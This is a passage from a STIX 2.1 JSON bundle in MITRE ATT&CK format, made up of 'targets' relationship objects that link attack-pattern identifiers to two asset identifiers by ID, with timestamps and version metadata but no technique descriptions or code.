"x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--14e601b8-8fc5-40be-b8c3-a9b3986ca7b0", "created": "2024-07-01T10:37:15.821266", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821268", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e4ea87f0-1ed9-455e-afd7-75014f47c555", "created": "2024-07-01T10:37:15.821276", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821278", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b65ef609-c53d-4a22-9a6d-b74799469c1b", "created": "2024-07-01T10:37:15.821286", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821289", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8d2bdbf0-e487-46ba-813e-bb9f3a8db06a", "created": "2024-07-01T10:37:15.821297", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821299", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5b7b948a-641d-4481-b7d7-0289b9d55a3d", "created": "2024-07-01T10:37:15.821307", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821309", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ffbcfdb0-de22-4106-9ed3-fc23c8a01407", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b46adc8b-dd37-4ce9-9dc9-2d056546c16d", "created": "2024-07-01T10:37:15.821317", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821319", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ffe59ad3-ad9b-4b9f-b74f-5beb3c309dc1", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2cc469dd-76a6-42ae-b84f-efa5b697a764", "created": "2024-07-01T10:37:15.821328", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821330", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--86882f25-6d93-4c3e-b2b0-972898c9ea05", "created": "2024-07-01T10:37:15.821339", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821341", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c87ff94a-fdcf-4ac2-9486-6a5aac6100df", "created": "2024-07-01T10:37:15.821349", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821352", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6663a474-5ae5-4433-9095-c3857a7e5e44", "created": "2024-07-01T10:37:15.821359", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821362", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6230d0e7-0873-4e58-a05c-75f85497705f", "created": "2024-07-01T10:37:15.821369", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821372", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bfd07b5f-bcab-4098-ad65-86243bdcce54", "created": "2024-07-01T10:37:15.821379", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821382", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--63d7258d-118a-4a8b-a15f-7ad7306e3e4c", "created": "2024-07-01T10:37:15.821389", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821391", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ed294aac-b03c-478d-a356-44eac9d2be76", "created": "2024-07-01T10:37:15.821399", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821401", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--98dd654c-498e-4cdc-9fac-da0c0d5e21bf", "created": "2024-07-01T10:37:15.821410", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821412", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6ac9cf3d-830e-4abb-b5c0-9ec4fdda2e7d", "created": "2024-07-01T10:37:15.821420", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821422", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d1770f65-3263-4448-878e-36855f3d95ef", "created": "2024-07-01T10:37:15.821430", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821432", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a4c5fbc9-7783-48f4-9f6e-3bad8fc347ef", "created": "2024-07-01T10:37:15.821440", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821442", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9a9af5d6-3390-471f-ad49-c029be51a308", "created": "2024-07-01T10:37:15.821450", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821452", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09b008a9-b4eb-462a-a751-a0eb58050cd9", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3e1559b1-71b8-44ab-a8ad-b81d550c8c42", "created": "2024-07-01T10:37:15.821460", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821462", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09b130a2-a77e-4af0-a361-f46f9aad1345", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ecb48fa7-de05-4102-b1ff-e71327e0aca8", "created": "2024-07-01T10:37:15.821470", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821472", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4554559b-22ee-4cf6-91f7-7ac4bfc315f9", "created": "2024-07-01T10:37:15.821480", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821482", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--984b8959-ea59-4b3c-8004-9837a51a8139", "created": "2024-07-01T10:37:15.821490", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821492", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c10bca2c-7125-4c1f-8787-fd29cb8e403e", "created": "2024-07-01T10:37:15.821500", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821502", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b78e4737-ac42-4b89-88b7-36a02eb2df40", "created": "2024-07-01T10:37:15.821510", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821512", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--954a8821-6c4c-4ea2-bcc7-27f1da1ebfcf", "created": "2024-07-01T10:37:15.821520", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821522", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--970d8a74-0ebb-447d-bbc7-ea3f832d17ba", "created": "2024-07-01T10:37:15.821530", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821532", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e0f83a0b-335b-4525-a788-8860746a2ea2", "created": "2024-07-01T10:37:15.821540", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821542", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--46bb7fef-81fd-42d6-ae12-2e631aadb931", "created": "2024-07-01T10:37:15.821550", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821552", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0d91b3c0-5e50-47c3-949a-2a796f04d144", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--179ce0ab-3458-488c-bbc0-71810d0a7717", "created": "2024-07-01T10:37:15.821560", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821562", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1df8ca11-6358-4d2b-be2a-63805f196aa8", "created": "2024-07-01T10:37:15.821570", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821572", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e70adaed-354b-4d74-b6b4-a9cfbb6f77b0", "created": "2024-07-01T10:37:15.821580", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821582", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2aebb1dc-a937-49ae-8570-9e3a48554996", "created": "2024-07-01T10:37:15.821590", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821592", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d01efcdd-0e1f-4a85-bed6-bdcc4e1cb043", "created": "2024-07-01T10:37:15.821600", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821602", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2ddb4db3-6922-46f1-963b-d4d86109eab3", "created": "2024-07-01T10:37:15.821610", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821612", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cb365cc0-79be-4e39-a080-027515d72e53", "created": "2024-07-01T10:37:15.821620", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821622", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b6548116-1c84-4f84-aecc-6d6ba2166503", "created": "2024-07-01T10:37:15.821630", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821632", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--03dcefbc-556f-49e1-978d-553847700c7f", "created": "2024-07-01T10:37:15.821640", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821642", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5f9ad57b-0ee7-41e0-8bd0-3aad399d2ce8", "created": "2024-07-01T10:37:15.821650", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821652", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1d8e27c1-095a-4b12-ad01-d05e3505b9fb", "created": "2024-07-01T10:37:15.821660", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821663", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7e87cad5-4acc-4818-81a4-020bc835ba6b", "created": "2024-07-01T10:37:15.821671", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821673", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", 